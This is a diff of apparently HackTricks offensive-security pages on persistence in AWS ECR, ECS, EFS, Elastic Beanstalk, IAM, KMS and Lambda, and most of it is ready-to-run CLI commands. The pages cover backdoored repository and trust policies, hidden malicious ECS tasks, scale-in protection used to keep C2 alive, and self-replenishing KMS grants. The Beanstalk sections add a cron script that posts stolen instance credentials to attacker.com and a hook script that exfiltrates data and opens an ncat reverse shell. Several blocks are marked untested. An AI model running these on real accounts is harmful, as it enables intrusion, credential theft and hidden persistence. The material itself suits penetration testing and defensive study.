{
"Sid": "asdasd",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::947247140022:root"
},
"Action": [
"ecr:CreateRepository",
"ecr:ReplicateImage"
],
"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
}
```
Then apply the replication config:
```bash
aws ecr put-replication-configuration \
--replication-configuration file://replication-settings.json \
--region us-west-2
# Having the .json a content such as:
{
"rules": [{
"destinations": [{
"region": "destination_region",
"registryId": "destination_accountId"
}],
"repositoryFilters": [{
"filter": "repository_prefix_name",
"filterType": "PREFIX_MATCH"
}]
}]
}
```
### Repository Creation Templates (backdoor future repositories by prefix)
Abuse ECR Repository Creation Templates to automatically backdoor any repository that ECR auto-creates under a controlled prefix (e.g., via Pull-Through Cache or Create-on-Push). This persistently grants unauthorized access to future repositories without modifying existing ones.
- Required permissions: ecr:CreateRepositoryCreationTemplate, ecr:DescribeRepositoryCreationTemplates, ecr:UpdateRepositoryCreationTemplate, ecr:DeleteRepositoryCreationTemplate, ecr:SetRepositoryPolicy (used by the template), iam:PassRole (if the template attaches a custom role)
- Impact: any new repository created under the target prefix automatically inherits an attacker-controlled repository policy (e.g., cross-account read/write), tag mutability and scanning defaults.
<details>
<summary>Backdoor future PTC-created repositories under a chosen prefix</summary>
```bash
# Region
REGION=us-east-1
# 1) Prepare permissive repository policy (example grants everyone RW)
cat > /tmp/repo_backdoor_policy.json <<'JSON'
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "BackdoorRW",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer",
"ecr:InitiateLayerUpload",
"ecr:UploadLayerPart",
"ecr:CompleteLayerUpload",
"ecr:PutImage"
]
}
]
}
JSON
# 2) Create a Repository Creation Template for prefix "ptc2" applied to PULL_THROUGH_CACHE
aws ecr create-repository-creation-template --region $REGION --prefix ptc2 --applied-for PULL_THROUGH_CACHE --image-tag-mutability MUTABLE --repository-policy file:///tmp/repo_backdoor_policy.json
# 3) Create a Pull-Through Cache rule that will auto-create repos under that prefix
# This example caches from Amazon ECR Public namespace "nginx"
aws ecr create-pull-through-cache-rule --region $REGION --ecr-repository-prefix ptc2 --upstream-registry ecr-public --upstream-registry-url public.ecr.aws --upstream-repository-prefix nginx
# 4) Trigger auto-creation by pulling a new path once (creates repo ptc2/nginx)
acct=$(aws sts get-caller-identity --query Account --output text)
aws ecr get-login-password --region $REGION | docker login --username AWS --password-stdin ${acct}.dkr.ecr.${REGION}.amazonaws.com
docker pull ${acct}.dkr.ecr.${REGION}.amazonaws.com/ptc2/nginx:latest
# 5) Validate the backdoor policy was applied on the newly created repository
aws ecr get-repository-policy --region $REGION --repository-name ptc2/nginx --query policyText --output text | jq .
```
</details>
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,103 @@
# AWS - ECS Persistence
{{#include ../../../banners/hacktricks-training.md}}
## ECS
For more information check:
{{#ref}}
../aws-services/aws-ecs-enum.md
{{#endref}}
### Hidden Periodic ECS Task
> [!NOTE]
> TODO: Test
An attacker can create a hidden periodic ECS task using Amazon EventBridge to **schedule the execution of a malicious task periodically**. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account.
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'
# Create an Amazon EventBridge rule to trigger the task periodically
aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate(1 day)"
# Add a target to the rule to run the malicious ECS task
aws events put-targets --rule "malicious-ecs-task-rule" --targets '[
{
"Id": "malicious-ecs-task-target",
"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
"EcsParameters": {
"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
"TaskCount": 1
}
}
]'
```
### Backdoor Container in Existing ECS Task Definition
> [!NOTE]
> TODO: Test
An attacker can add a **stealthy backdoor container** in an existing ECS task definition that runs alongside legitimate containers. The backdoor container can be used for persistence and performing malicious activities.
```bash
# Update the existing task definition to include the backdoor container
aws ecs register-task-definition --family "existing-task" --container-definitions '[
{
"name": "legitimate-container",
"image": "legitimate-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
},
{
"name": "backdoor-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": false
}
]'
```
### Undocumented ECS Service
> [!NOTE]
> TODO: Test
An attacker can create an **undocumented ECS service** that runs a malicious task. By setting the desired number of tasks to a minimum and disabling logging, it becomes harder for administrators to notice the malicious service.
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'
# Create an undocumented ECS service with the malicious task definition
aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,152 +0,0 @@
# AWS - ECS Persistence
{{#include ../../../../banners/hacktricks-training.md}}
## ECS
For more information check:
{{#ref}}
../../aws-services/aws-ecs-enum.md
{{#endref}}
### Hidden Periodic ECS Task
> [!NOTE]
> TODO: Test
An attacker can create a hidden periodic ECS task using Amazon EventBridge to **schedule the execution of a malicious task periodically**. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account.
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'
# Create an Amazon EventBridge rule to trigger the task periodically
aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate(1 day)"
# Add a target to the rule to run the malicious ECS task
aws events put-targets --rule "malicious-ecs-task-rule" --targets '[
{
"Id": "malicious-ecs-task-target",
"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
"EcsParameters": {
"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
"TaskCount": 1
}
}
]'
```
### Backdoor Container in an Existing ECS Task Definition
> [!NOTE]
> TODO: Test
An attacker can add a **stealthy backdoor container** to an existing ECS task definition that runs alongside the legitimate containers. The backdoor container can be used for persistence and for performing malicious activities.
```bash
# Update the existing task definition to include the backdoor container
aws ecs register-task-definition --family "existing-task" --container-definitions '[
{
"name": "legitimate-container",
"image": "legitimate-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
},
{
"name": "backdoor-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": false
}
]'
```
### Undocumented ECS Service
> [!NOTE]
> TODO: Test
An attacker can create an **undocumented ECS service** that runs a malicious task. By setting the desired task count to a minimum and disabling logging, it becomes harder for administrators to notice the malicious service.
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'
# Create an undocumented ECS service with the malicious task definition
aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"
```
### ECS Persistence via Task Scale-In Protection (UpdateTaskProtection)
Abuse ecs:UpdateTaskProtection to prevent service tasks from being stopped by scale-in events and rolling deployments. By continuously extending the protection, an attacker can keep a long-running task alive (for C2 or data collection) even if defenders reduce the desiredCount or push a new task revision.
Steps to reproduce in us-east-1:
```bash
# 1) Cluster (create if missing)
CLUSTER=$(aws ecs list-clusters --query 'clusterArns[0]' --output text 2>/dev/null)
[ -z "$CLUSTER" -o "$CLUSTER" = "None" ] && CLUSTER=$(aws ecs create-cluster --cluster-name ht-ecs-persist --query 'cluster.clusterArn' --output text)
# 2) Minimal backdoor task that just sleeps (Fargate/awsvpc)
cat > /tmp/ht-persist-td.json << 'JSON'
{
"family": "ht-persist",
"networkMode": "awsvpc",
"requiresCompatibilities": ["FARGATE"],
"cpu": "256",
"memory": "512",
"containerDefinitions": [
{"name": "idle","image": "public.ecr.aws/amazonlinux/amazonlinux:latest",
"command": ["/bin/sh","-c","sleep 864000"]}
]
}
JSON
aws ecs register-task-definition --cli-input-json file:///tmp/ht-persist-td.json >/dev/null
# 3) Create service (use default VPC public subnet + default SG)
VPC=$(aws ec2 describe-vpcs --filters Name=isDefault,Values=true --query 'Vpcs[0].VpcId' --output text)
SUBNET=$(aws ec2 describe-subnets --filters Name=vpc-id,Values=$VPC Name=map-public-ip-on-launch,Values=true --query 'Subnets[0].SubnetId' --output text)
SG=$(aws ec2 describe-security-groups --filters Name=vpc-id,Values=$VPC Name=group-name,Values=default --query 'SecurityGroups[0].GroupId' --output text)
aws ecs create-service --cluster "$CLUSTER" --service-name ht-persist-svc \
--task-definition ht-persist --desired-count 1 --launch-type FARGATE \
--network-configuration "awsvpcConfiguration={subnets=[$SUBNET],securityGroups=[$SG],assignPublicIp=ENABLED}"
# 4) Get running task ARN
TASK=$(aws ecs list-tasks --cluster "$CLUSTER" --service-name ht-persist-svc --desired-status RUNNING --query 'taskArns[0]' --output text)
# 5) Enable scale-in protection for 24h and verify
aws ecs update-task-protection --cluster "$CLUSTER" --tasks "$TASK" --protection-enabled --expires-in-minutes 1440
aws ecs get-task-protection --cluster "$CLUSTER" --tasks "$TASK"
# 6) Try to scale service to 0 (task should persist)
aws ecs update-service --cluster "$CLUSTER" --service ht-persist-svc --desired-count 0
aws ecs list-tasks --cluster "$CLUSTER" --service-name ht-persist-svc --desired-status RUNNING
# Optional: rolling deployment blocked by protection
aws ecs register-task-definition --cli-input-json file:///tmp/ht-persist-td.json >/dev/null
aws ecs update-service --cluster "$CLUSTER" --service ht-persist-svc --task-definition ht-persist --force-new-deployment
aws ecs describe-services --cluster "$CLUSTER" --services ht-persist-svc --query 'services[0].events[0]'
# 7) Cleanup
aws ecs update-task-protection --cluster "$CLUSTER" --tasks "$TASK" --no-protection-enabled || true
aws ecs update-service --cluster "$CLUSTER" --service ht-persist-svc --desired-count 0 || true
aws ecs delete-service --cluster "$CLUSTER" --service ht-persist-svc --force || true
aws ecs deregister-task-definition --task-definition ht-persist || true
```
Impact: the protected task remains RUNNING even with desiredCount=0 and blocks replacement during new deployments, enabling stealthy long-term persistence inside an ECS service.
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,25 @@
# AWS - EFS Persistence
{{#include ../../../banners/hacktricks-training.md}}
## EFS
For more information check:
{{#ref}}
../aws-services/aws-efs-enum.md
{{#endref}}
### Modify Resource Policy / Security Groups
By modifying the **resource policy and/or security groups** you can try to persist your access to the file system.
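For example (the file system ID and attacker account ID are placeholders), a backdoored file system policy granting an external account NFS client access could look like this:

```shell
# Attacker account ID is a placeholder; requires elasticfilesystem:PutFileSystemPolicy
cat > /tmp/efs_backdoor_policy.json <<'JSON'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "BackdoorClientAccess",
      "Effect": "Allow",
      "Principal": { "AWS": "arn:aws:iam::<attacker-account-id>:root" },
      "Action": [
        "elasticfilesystem:ClientMount",
        "elasticfilesystem:ClientWrite",
        "elasticfilesystem:ClientRootAccess"
      ]
    }
  ]
}
JSON
aws efs put-file-system-policy --file-system-id "<fs-id>" --policy file:///tmp/efs_backdoor_policy.json
```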
### Create Access Point
You could **create an access point** (with root access to `/`) reachable from a service where you have implemented **other persistence**, to keep privileged access to the file system.
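A hedged sketch of such an access point (file system ID and tag value are assumptions), using `--cli-input-json`:

```shell
# Hypothetical file system ID; requires elasticfilesystem:CreateAccessPoint
cat > /tmp/ap.json <<'JSON'
{
  "FileSystemId": "fs-0123456789abcdef0",
  "PosixUser": { "Uid": 0, "Gid": 0 },
  "RootDirectory": { "Path": "/" },
  "Tags": [ { "Key": "Name", "Value": "backup-ap" } ]
}
JSON
# Every NFS client mounting through this access point acts as root over the whole file system
aws efs create-access-point --cli-input-json file:///tmp/ap.json
```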
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,21 +0,0 @@
# AWS - EFS Persistence
{{#include ../../../../banners/hacktricks-training.md}}
## EFS
For more information check:
{{#ref}}
../../aws-services/aws-efs-enum.md
{{#endref}}
### Modify Resource Policy / Security Groups
By modifying the **resource policy and/or security groups** you can try to persist your access to the file system.
### Create Access Point
You could **create an access point** (with root access to `/`) reachable from a service where you have implemented **other persistence**, to keep privileged access to the file system.
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,81 @@
# AWS - Elastic Beanstalk Persistence
{{#include ../../../banners/hacktricks-training.md}}
## Elastic Beanstalk
For more information check:
{{#ref}}
../aws-services/aws-elastic-beanstalk-enum.md
{{#endref}}
### Persistence in Instance
In order to maintain persistence inside the AWS account, some **persistence mechanism could be introduced inside the instance** (cron job, ssh key...) so the attacker will be able to access it and steal IAM role **credentials from the metadata service**.
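As a sketch (the C2 URL and file names are hypothetical), a cron job dropped on the instance could periodically exfiltrate the instance role credentials from IMDSv2:

```shell
# Script to be dropped on the Beanstalk EC2 instance (e.g. via .ebextensions or SSH)
cat > /tmp/awslogd <<'EOF'
#!/bin/bash
# Grab the instance role credentials from IMDSv2 and ship them to the attacker
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 300")
ROLE=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/)
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE" |
  curl -s -X POST --data-binary @- https://attacker.com/creds
EOF
chmod +x /tmp/awslogd
# On the instance: install it with an innocuous name
# cp /tmp/awslogd /etc/cron.hourly/awslogd
```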
### Backdoor in Version
An attacker could backdoor the code inside the S3 repo so it always executes its backdoor as well as the expected code.
### New backdoored version
Instead of changing the code of the current version, the attacker could deploy a new backdoored version of the application.
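A minimal sketch, assuming the backdoored bundle has already been uploaded to S3 (application, environment and bucket names are placeholders):

```shell
# Requires elasticbeanstalk:CreateApplicationVersion and elasticbeanstalk:UpdateEnvironment
VER="hotfix-$(date +%s)"   # innocuous-looking version label
aws elasticbeanstalk create-application-version \
  --application-name my-app \
  --version-label "$VER" \
  --source-bundle S3Bucket=my-app-bucket,S3Key=backdoored-app.zip
aws elasticbeanstalk update-environment \
  --environment-name my-env \
  --version-label "$VER"
```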
### Abusing Custom Resource Lifecycle Hooks
> [!NOTE]
> TODO: Test
Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could **configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account**.
```bash
# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh
# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh
# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
AWSEBAutoScalingGroup:
Metadata:
AWS::ElasticBeanstalk::Ext:
TriggerConfiguration:
triggers:
- name: stealthy-lifecycle-hook
events:
- "autoscaling:EC2_INSTANCE_LAUNCH"
- "autoscaling:EC2_INSTANCE_TERMINATE"
target:
ref: "AWS::ElasticBeanstalk::Environment"
arn:
Fn::GetAtt:
- "AWS::ElasticBeanstalk::Environment"
- "Arn"
stealthyLifecycleHook:
Type: AWS::AutoScaling::LifecycleHook
Properties:
AutoScalingGroupName:
Ref: AWSEBAutoScalingGroup
LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
NotificationTargetARN:
Ref: stealthy-lifecycle-hook
RoleARN:
Fn::GetAtt:
- AWSEBAutoScalingGroup
- Arn' > stealthy_lifecycle_hook.yaml
# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,75 +0,0 @@
# AWS - Elastic Beanstalk Persistence
{{#include ../../../../banners/hacktricks-training.md}}
## Elastic Beanstalk
For more information check:
{{#ref}}
../../aws-services/aws-elastic-beanstalk-enum.md
{{#endref}}
### Persistence in the Instance
To maintain persistence inside the AWS account, some **persistence mechanism could be introduced inside the instance** (cron job, ssh key...) so the attacker will be able to access it and steal the IAM role **credentials from the metadata service**.
### Backdoor in Version
An attacker could backdoor the code inside the S3 repo so it always executes its backdoor as well as the expected code.
### New Backdoored Version
Instead of changing the code of the current version, the attacker could deploy a new backdoored version of the application.
### Abusing Custom Resource Lifecycle Hooks
> [!NOTE]
> TODO: Test
Elastic Beanstalk provides lifecycle hooks that allow running custom scripts during instance provisioning and termination. An attacker could **configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account**.
```bash
# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh
# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh
# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
AWSEBAutoScalingGroup:
Metadata:
AWS::ElasticBeanstalk::Ext:
TriggerConfiguration:
triggers:
- name: stealthy-lifecycle-hook
events:
- "autoscaling:EC2_INSTANCE_LAUNCH"
- "autoscaling:EC2_INSTANCE_TERMINATE"
target:
ref: "AWS::ElasticBeanstalk::Environment"
arn:
Fn::GetAtt:
- "AWS::ElasticBeanstalk::Environment"
- "Arn"
stealthyLifecycleHook:
Type: AWS::AutoScaling::LifecycleHook
Properties:
AutoScalingGroupName:
Ref: AWSEBAutoScalingGroup
LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
NotificationTargetARN:
Ref: stealthy-lifecycle-hook
RoleARN:
Fn::GetAtt:
- AWSEBAutoScalingGroup
- Arn' > stealthy_lifecycle_hook.yaml
# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
```
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,53 @@
# AWS - IAM Persistence
{{#include ../../../banners/hacktricks-training.md}}
## IAM
For more information check:
{{#ref}}
../aws-services/aws-iam-enum.md
{{#endref}}
### Common IAM Persistence
- Create a user
- Add a controlled user to a privileged group
- Create access keys (for the new user or for all users)
- Grant extra permissions to controlled users/groups (attached policies or inline policies)
- Disable MFA / add your own MFA device
- Create a Role Chain Juggling situation (more on this below in STS persistence)
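A sketch of these steps with the AWS CLI (user, group and policy names are hypothetical and should blend in with the account's naming conventions):

```shell
# Hypothetical names - pick ones that look legitimate in the target account
aws iam create-user --user-name support-svc
aws iam add-user-to-group --user-name support-svc --group-name admins
# Long-lived credentials for the controlled user
aws iam create-access-key --user-name support-svc \
  --query 'AccessKey.[AccessKeyId,SecretAccessKey]' --output text
# Inline policies are sometimes less visible than attached managed policies
cat > /tmp/inline_admin.json <<'JSON'
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": "*", "Resource": "*" } ] }
JSON
aws iam put-user-policy --user-name support-svc --policy-name maintenance \
  --policy-document file:///tmp/inline_admin.json
```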
### Backdoor Role Trust Policies
You could backdoor a role's trust policy so that the role can be assumed from an external resource controlled by you (or by everyone):
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": ["*", "arn:aws:iam::123213123123:root"]
},
"Action": "sts:AssumeRole"
}
]
}
```
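To apply it, the trust policy is written over the role with `iam:UpdateAssumeRolePolicy` (role name and account IDs below are placeholders):

```shell
# Role name and account IDs are placeholders; requires iam:UpdateAssumeRolePolicy
ROLE=TargetRole
cat > /tmp/trust.json <<'JSON'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": { "AWS": "arn:aws:iam::123213123123:root" },
      "Action": "sts:AssumeRole"
    }
  ]
}
JSON
aws iam update-assume-role-policy --role-name "$ROLE" --policy-document file:///tmp/trust.json
# Later, from the attacker principal:
aws sts assume-role --role-arn "arn:aws:iam::<victim-account>:role/$ROLE" --role-session-name maint
```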
### Backdoor Policy Version
Give Administrator permissions to a policy in a version that is not its default one (the default version should look legit). Since only a policy's default version is enforced, the attacker flips the default to the backdoored version whenever access is needed.
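A sketch of this with the IAM API (the policy ARN and version ID are assumptions); note that only a policy's default version is enforced, so the switch happens with `set-default-policy-version`:

```shell
POLICY_ARN="arn:aws:iam::<account-id>:policy/SomeCustomPolicy"
cat > /tmp/admin_version.json <<'JSON'
{ "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": "*", "Resource": "*" } ] }
JSON
# Create the backdoored version without making it the default (the default keeps looking legit)
aws iam create-policy-version --policy-arn "$POLICY_ARN" \
  --policy-document file:///tmp/admin_version.json --no-set-as-default
# Flip the default to the backdoored version (e.g. v2) when access is needed, then flip it back
aws iam set-default-policy-version --policy-arn "$POLICY_ARN" --version-id v2
```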
### Backdoor / Create Identity Provider
If the account is already trusting a common identity provider (such as Github), the conditions of the trust could be relaxed so the attacker can abuse them.
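For example (account ID and role name are assumptions), if a role already trusts the GitHub OIDC provider, widening its `sub` condition lets any repository, including the attacker's, assume it:

```shell
# Relax the trust of a role that already trusts GitHub's OIDC provider
cat > /tmp/oidc_trust.json <<'JSON'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": { "Federated": "arn:aws:iam::<account-id>:oidc-provider/token.actions.githubusercontent.com" },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": { "StringLike": { "token.actions.githubusercontent.com:sub": "repo:*" } }
    }
  ]
}
JSON
aws iam update-assume-role-policy --role-name "<github-deploy-role>" --policy-document file:///tmp/oidc_trust.json
```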
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,47 +0,0 @@
# AWS - IAM Persistence
{{#include ../../../../banners/hacktricks-training.md}}
## IAM
For more information check:
{{#ref}}
../../aws-services/aws-iam-enum.md
{{#endref}}
### Common IAM Persistence
- Create a user
- Add a controlled user to a privileged group
- Create access keys (for the new user or for all users)
- Grant extra permissions to controlled users/groups (attached policies or inline policies)
- Disable MFA / add your own MFA device
- Create a Role Chain Juggling situation (more on this below in STS persistence)
### Backdoor Role Trust Policies
You could backdoor a role's trust policy so that the role can be assumed from an external resource controlled by you (or by everyone):
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": ["*", "arn:aws:iam::123213123123:root"]
},
"Action": "sts:AssumeRole"
}
]
}
```
### Backdoor Policy Version
Give Administrator permissions to a policy in a version that is not the latest one (the latest version should look legit), then assign that version of the policy to a controlled user/group.
### Backdoor / Create Identity Provider
If the account already trusts a common identity provider (such as Github), the conditions of the trust can be relaxed so the attacker can abuse them.
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,43 @@
# AWS - KMS Persistence
{{#include ../../../banners/hacktricks-training.md}}
## KMS
For more information check:
{{#ref}}
../aws-services/aws-kms-enum.md
{{#endref}}
### Grant access via KMS policies
An attacker could use the **`kms:PutKeyPolicy`** permission to **give access** to a key to a user under their control, or even to an external account. Check the [**KMS Privesc page**](../aws-privilege-escalation/aws-kms-privesc.md) for more information.
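A sketch of such a backdoored key policy (account IDs are placeholders); note that the legitimate admin statement is kept so nothing breaks:

```shell
# Requires kms:PutKeyPolicy on the target key
cat > /tmp/key_policy.json <<'JSON'
{
  "Version": "2012-10-17",
  "Statement": [
    { "Sid": "KeepAdmin", "Effect": "Allow",
      "Principal": { "AWS": "arn:aws:iam::<victim-account>:root" },
      "Action": "kms:*", "Resource": "*" },
    { "Sid": "Backdoor", "Effect": "Allow",
      "Principal": { "AWS": "arn:aws:iam::<attacker-account>:root" },
      "Action": [ "kms:Decrypt", "kms:Encrypt", "kms:CreateGrant" ], "Resource": "*" }
  ]
}
JSON
aws kms put-key-policy --key-id "<key-id>" --policy-name default --policy file:///tmp/key_policy.json
```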
### Eternal Grant
Grants are another way to give a principal permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grants (even identical ones) over the same key.
Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly, and if at some point 1 grant is removed, another 10 should be generated.
(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grants left)
```bash
# To generate grants, generate 10 like this one
aws kms create-grant \
--key-id <key-id> \
--grantee-principal <user_arn> \
--operations "CreateGrant" "Decrypt"
# To monitor grants
aws kms list-grants --key-id <key-id>
```
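The monitor-and-replenish logic above could be automated with something like this (key ID and principal ARN are placeholders):

```shell
# Run periodically (e.g. from cron) to keep ~10 grants alive for the controlled principal
KEY="<key-id>"; WHO="<user_arn>"
CUR=$(aws kms list-grants --key-id "$KEY" \
  --query "length(Grants[?GranteePrincipal=='$WHO'])" --output text 2>/dev/null)
NEED=$((10 - ${CUR:-0}))
for i in $(seq 1 "$NEED"); do
  aws kms create-grant --key-id "$KEY" --grantee-principal "$WHO" \
    --operations "CreateGrant" "Decrypt"
done
```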
> [!NOTE]
> A grant can only give permissions from this list: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,37 +0,0 @@
# AWS - KMS Persistence
{{#include ../../../../banners/hacktricks-training.md}}
## KMS
For more information check:
{{#ref}}
../../aws-services/aws-kms-enum.md
{{#endref}}
### Grant access via KMS policies
An attacker could use the **`kms:PutKeyPolicy`** permission to **give access** to a key to a user under their control, or even to an external account. Check the [**KMS Privesc page**](../../aws-privilege-escalation/aws-kms-privesc/README.md) for more information.
### Eternal Grant
Grants are another way to give a principal permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grants (even identical ones) over the same key.
Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly, and if at some point 1 grant is removed, another 10 should be generated.
(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grants left)
```bash
# To generate grants, generate 10 like this one
aws kms create-grant \
--key-id <key-id> \
--grantee-principal <user_arn> \
--operations "CreateGrant" "Decrypt"
# To monitor grants
aws kms list-grants --key-id <key-id>
```
> [!NOTE]
> A grant can only give permissions from this list: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -1,133 +1,68 @@
# AWS - Lambda Persistence
{{#include ../../../../banners/hacktricks-training.md}}
## Lambda
For more information check:
{{#ref}}
../../aws-services/aws-lambda-enum.md
{{#endref}}
### Lambda Layer Persistence
It's possible to **introduce/backdoor a layer to execute arbitrary code** when the lambda is executed in a stealthy way:
{{#ref}}
aws-lambda-layers-persistence.md
{{#endref}}
### Lambda Extension Persistence
Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.
{{#ref}}
aws-abusing-lambda-extensions.md
{{#endref}}
### Via resource policies
It's possible to grant access to different lambda actions (such as invoke or update code) to external accounts:
<figure><img src="../../../../images/image (255).png" alt=""><figcaption></figcaption></figure>
### Versions, Aliases & Weights
A Lambda can have **different versions** (with different code each version).\
Then, you can create **different aliases with different versions** of the lambda and set different weights to each.\
This way an attacker could create a **backdoored version 1** and a **version 2 with only the legit code** and **only execute the version 1 in 1%** of the requests to remain stealth.
<figure><img src="../../../../images/image (120).png" alt=""><figcaption></figcaption></figure>
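The weighted-routing setup above could be sketched like this (function name, alias name and version numbers are assumptions):

```shell
# ~1% of invocations of alias "prod" go to backdoored version 1; the rest hit clean version 2
cat > /tmp/routing.json <<'JSON'
{ "AdditionalVersionWeights": { "1": 0.01 } }
JSON
aws lambda create-alias --function-name "<func_name>" --name prod \
  --function-version 2 --routing-config file:///tmp/routing.json
# For an already-existing alias use update-alias instead
aws lambda update-alias --function-name "<func_name>" --name prod \
  --function-version 2 --routing-config file:///tmp/routing.json
```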
### Version Backdoor + API Gateway
1. Copy the original code of the Lambda
2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST
1. Call the API gateway related to the lambda to execute the code
3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST.
1. This will hide the backdoored code in a previous version
4. Go to the API Gateway and **create a new POST method** (or choose any other method) that will execute the backdoored version of the lambda: `arn:aws:lambda:us-east-1:<acc_id>:function:<func_name>:1`
1. Note the final :1 of the arn **indicating the version of the function** (version 1 will be the backdoored one in this scenario).
5. Select the POST method created and in Actions select **`Deploy API`**
6. Now, when you **call the function via POST your Backdoor** will be invoked
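Steps 4-6 can be scripted; the IDs below are placeholders and the integration URI embeds the version-qualified ARN (note the `:1`):

```shell
# Placeholders: API id, resource id, account id and function name are assumptions
REGION=us-east-1
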